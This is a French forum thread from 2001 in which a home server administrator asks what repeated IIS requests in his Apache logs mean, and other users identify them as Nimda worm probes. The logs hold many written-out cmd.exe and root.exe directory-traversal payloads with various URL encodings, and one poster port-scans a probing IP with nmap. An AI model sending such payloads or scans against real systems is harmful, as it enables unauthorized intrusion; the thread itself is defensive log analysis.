Que veulent dire ces logs sur un serveur Web ? Tentative de hack ?

Recherche :

Dernière réponse
Sujet : Que veulent dire ces logs sur un serveur Web ? Tentative de hack ?
gizmo	une bride de réponse serait que l'utilsateur a coupé sa connexion en plein milieu d'attaque. Sinon, c'est juste un pauvre blaireau qui tente au hasard.

Votre réponse

Nom d'utilisateur

Pour poster, vous devez être inscrit sur ce forum .... si ce n'est pas le cas, cliquez ici !

Le ton de votre message

Votre réponse

Smilies

Liste des smilies perso
Wiki smilies
Chercher un smiley

Options

Activer votre signature
Désactiver les smilies
Activer la notification par email du sujet

Aperçu

Vous avez perdu votre mot de passe ?

Vue Rapide de la discussion

gizmo

une bride de réponse serait que l'utilsateur a coupé sa connexion en plein milieu d'attaque. Sinon, c'est juste un pauvre blaireau qui tente au hasard.

Groody

merci en passant ;)

[edtdd]--Message édité par Groody--[/edtdd]

Groody

non, l'avant derniere tentative, une seule ligne, et là, que 2.

Avec des tentatives en moyennes toutes les 25 minutes on va dire, j'ai pas que ça a faire. C'est quand même allicinant...

gizmo

Groody a écrit a écrit :

Ca aussi c Nimda ??? (Encore une IP...)

MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:23 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"

si ca continue avec tout une série de commande comme plus haut, oui, c'est toujours nimda. Il exécute toujours les même commandes en espérant tomber sur un server NT sans protection. Mais comme t'es sous nux, tu risque rien. Au mieux, si l'ip correspond a un serveur avec mail, préviens-les qu'ils sont verolés.

Groody

toutes les IP qui tentent commencent par 62.. zarb, hazard ? Y'a une zone géographique dans laquelle on est plus vérolé qu'ailleurs ? ;)

Groody

Ca aussi c Nimda ??? (Encore une IP...)

MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.147.9.164 - - [23/Dec/2001:00:53:23 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"

Groody

Non, pas à jour. Le poste passerelle sur lequel je suis, W2k pro SP2 IE 5.5 SP2

c tout. Je vois pas ce que pourrai me faire Nimda. Le serveur est sous Nux.

gizmo

tu viens juste de te faire attaquer par nimda. Si t'es a jour dans tes patch, pas de problème.

Groody

finallement NMAP fonctionne sous 2K. Y'avais juste une DLL a déplacer :D

Now, ... Y'A plus qu'à comprendre comment ça fonctionne.. :lol:

P:\NMAP\Nmapnt>nmapnt

Starting nmapNT V. 2.53 SP1 by ryan@eEye.com
eEye Digital Security ( http://www.eEye.com )
based on nmap by fyodor@insecure.org ( www.insecure.org/nmap/ )

nmap V. 2.53 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
-sT TCP connect() port scan (default)
* -sS TCP SYN stealth port scan (best all-around TCP scan)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oM <logfile> Output normal/machine parsable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

WINDOWS Interface enumeration:
No Suitible Interfaces!

Groody

Encore un, mais la ligne est toute seul dans les logs...

MonDNS 62.0.113.83 - - [23/Dec/2001:00:35:16 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"

[edtdd]--Message édité par Groody--[/edtdd]

Groody

Bah vla la soluce ;).

Donc, que tente de faire ce virus ?

Bah, pareil, je risque rien. le serveur Web est sous Nux.

ethernal

comme dis Martinez, c pas grave c'est juste le virus nimda

c'est auomatique, c'est comme ça qu'il se propage, ça tombe les gars sont même pas au courant qu'ils sont contaminés.
ils scannent des range d'ip... t'es dedans... pas de bol ;)

maintenant ça se calme mais il y a qq semaines en restant connecter 30 minutes, je me tapais 4 ou 5 attaques d'ips différentes. Comme je suis sous Linux, je m'en tape :D ça remplit juste mes logs :( (que j'ai séparé heureusement)

ps : scanner c'est interdit :non: :D

[edtdd]--Message édité par ethernal--[/edtdd]

kaltan1

oui jai essayé netlab mais bon pour les ports c pas trés clair
j'utilise neotrace en principe c pas possible d'obtenir l'indication des ports ouverts?

kaltan

Groody

Merde Kalt, j'avais oublié que je t'en avais conseillé un :D.
C'est NMAP qui est sous NUX.

:pt1cable: le Groody ...

Groody

Kalt, malheureusement c sous Nux.. (si tu trouves une version Win..). Je crois que j'en avais trouvé une, mais.. je pouvais pas, je sais plus prq. Incompatible, ou ct les sources, ou une conneries comme ça.

kaltan1

merci je vais essayer ce petit soft

kaltan

verdoux

Je connais pas trop les softs de scan.
Là j'ai utilisé simplement nmap, sans bidouiller les options. D'ailleurs je maîtrise pas grand chose dans ce domaine.

Groody

un super outil, qui scanne, png, etc.. NetLab

kaltan1

Verdoux a écrit a écrit :

Je scanne les ports :D (avec nmap par exemple sous linux)

tu aurais un soft sous windows a me conseiller (simple si possible juste pour comprendre)

merci

Groody

Verdoux a écrit a écrit :

T'as dû laisser traîner ton IP quelque part (edonkey par exemple :D) et 2 gars ont cherché à voir si ils pouvaient pas creuser.

Hum... :D, pour une fois qu'il tourne....

3 Ip différentes quand ¨même!!! Et ils ont tous tenté de faire la même chose, regardez les URLs qui demandaient...

verdoux

kaltan1 a écrit a écrit :

comment fais tu d'aprés une Ip pour savoir quels ports il a d'ouverts?

kaltan

Je scanne les ports :D (avec nmap par exemple sous linux)

verdoux

T'as dû laisser traîner ton IP quelque part (edonkey par exemple :D) et 2 gars ont cherché à voir si ils pouvaient pas creuser.

kaltan1

Verdoux a écrit a écrit :

L'autre a une IP hongroise, avec aussi un FTP ouvert.

comment fais tu d'aprés une Ip pour savoir quels ports il a d'ouverts?

kaltan

kaltan1

Groody a écrit a écrit :

Tu en penses quoi ? Simple scanne ?
Prq de plusieurs IP différents, avec les mêmes tentatives ?

Spoofing ?

Le mecs essaye de voir quoi ? Si il peut lancer des commandes si ct un NT ?

simple scanne je sais rien mais en tout cas il a l'air de s'atarder sur ta bécanne

kaltan

Groody

plus rien depuis 23h44

Martinez

y a rien de louche, c des scripts qui essaient d'exploiter des failles de IIS en essayant serveur après serveur, ip après ip en essayant toutes les IPs d'un range ...
normal quoi...
nimda powa...

Groody

Tu en penses quoi ? Simple scanne ?
Prq de plusieurs IP différents, avec les mêmes tentatives ?

Spoofing ?

Le mecs essaye de voir quoi ? Si il peut lancer des commandes si ct un NT ?

kaltan1

c zarbe ouais le typ viens de Hongrie c louche :heink:

kaltan

verdoux

L'autre a une IP hongroise, avec aussi un FTP ouvert.

verdoux

Code :

Interesting ports on (62.211.170.28):
Port State Protocol Service
21 open tcp ftp
25 open tcp smtp
80 open tcp http
135 open tcp loc-srv
139 open tcp netbios-ssn
443 open tcp https
445 open tcp microsoft-ds
1025 open tcp listen

Groody

Verdoux, nouvelle IP ...

MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:25 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:38 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:50 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

Prq l'IP change ??? Il spoofe ?

Help

Groody

Une nouvelle IP tente de se connecter :

MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:14 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:25 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:33 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:38 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:50 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.112.205.173 - - [22/Dec/2001:23:44:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"

une PING -a IP ne donne rien.
Le tracert :

1 47 ms 47 ms 31 ms 192.168.254.254
2 31 ms 47 ms 47 ms blackd-th1-1-a0.routers.proxad.net [212.27.32.22
1]
3 47 ms 47 ms 47 ms blackd-cbv-2-a6.routers.proxad.net [213.228.3.22
]
4 31 ms 47 ms 47 ms 195.219.53.97
5 46 ms 250 ms 47 ms if-2-0.core1.Paris2.Teleglobe.net [195.219.14.65
]
6 109 ms 109 ms 110 ms if-6-0.core1.Milan.teleglobe.net [195.219.15.134
]
7 94 ms 93 ms 94 ms if-10-0-0.bb1.Milan.Teleglobe.net [195.219.137.3
9]
8 94 ms 94 ms 93 ms ix-8-1-0.bb1.Milan.Teleglobe.net [195.219.98.138
]
9 109 ms 110 ms 390 ms pal5-mil6-racc3.seabone.net [195.22.192.206]
10 110 ms 125 ms 125 ms ibs-11adsl-it-pal5.seabone.net [195.22.196.174]

11 110 ms 125 ms 109 ms r-rm199-fa3.interbusiness.it [151.99.29.152]
12 125 ms 157 ms 156 ms r-rm98-fa4.interbusiness.it [151.99.29.217]
13 110 ms 125 ms 125 ms r-rm201-7.interbusiness.it [151.99.29.102]
14 * * * Délai d'attente de la demande dépassé.
15 187 ms 203 ms 188 ms 62.211.205.173

verdoux

On essaie juste de voir si ton serveur est pas mal configuré :D

Groody

Et biensur dans les HTTPS/ERROR_LOG de la SME :

[Sat Dec 22 23:31:04 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/root.exe
[Sat Dec 22 23:31:05 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/MSADC/root.exe
[Sat Dec 22 23:31:05 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/c/winnt/system32/cmd.exe
[Sat Dec 22 23:31:06 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/d/winnt/system32/cmd.exe
[Sat Dec 22 23:31:06 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:07 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:07 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:08 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/msadc/..%5c../..%
5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd
.exe
[Sat Dec 22 23:31:08 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..Á../winnt/system32/cmd.exe
[Sat Dec 22 23:31:09 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..À¯../winnt/system32/cmd.exe
[Sat Dec 22 23:31:09 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..Á?../winnt/system32/cmd.exe
[Sat Dec 22 23:31:11 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Dec 22 23:31:11 2001] [error] [client 62.211.170.28] File does not exist: /home/e-smith/files/primary/html/scripts/..%2f../winnt/system32/cmd.exe

Groody

Salut,

Mon PC se connectant au net tourne sous 2k Pro SP2, et WinRoute Pro partage la connexion.
J'ai installé pour tests aujourd'hui une E-Smith 5.0 (SME, distri linux serveur HTTP, etc..).
Sur WinRoute, je fais du Port Mapping. Les personnes se connectant au port 80 sur mon IP publique sont renvoyées sur mon serveur Web sur le LAN.

Personne ne connait mon IP à part un ami. Dans les logs, je le vois lui, et une autre IP, et à la place d'avoir le logs de chargements du site hebergé (quelques HTM et GIF...) j'ai ceci :heink: :

MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:04 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:05 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:05 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:06 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:06 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:07 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:07 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:08 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:09 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:09 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:10 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:10 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:11 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
MonDNS 62.211.170.28 - - [22/Dec/2001:23:31:11 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"

Qui sait à quoi ça correspond ??? tentatives de hack ? :??:

[edtdd]--Message édité par Groody--[/edtdd]